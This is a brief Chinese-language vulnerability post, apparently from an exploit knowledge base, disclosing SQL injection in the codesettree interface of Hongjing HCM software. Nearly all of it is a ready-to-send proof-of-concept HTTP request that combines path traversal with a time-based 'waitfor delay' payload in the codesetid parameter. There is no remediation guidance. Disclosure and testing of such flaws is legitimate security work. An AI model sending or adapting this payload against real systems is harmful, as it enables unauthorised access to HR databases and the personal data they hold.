宏景HCM-codesettree接口存在SQL注入漏洞

本文最后更新于 2024年8月27日上午

宏景HCM-codesettree接口存在SQL注入漏洞

poc

GET /templates/attestation/../../servlet/codesettree?flag=3&codesetid=111';waitfor+delay+'0:0:2'--+&parentid=-1&fromflag=" HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:50.0)
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

漏洞知识库

宏景HCM-pos_dept_post存在SQL注入漏洞上一篇

宏景HCM系统fieldsettree接口存在SQL注入漏洞下一篇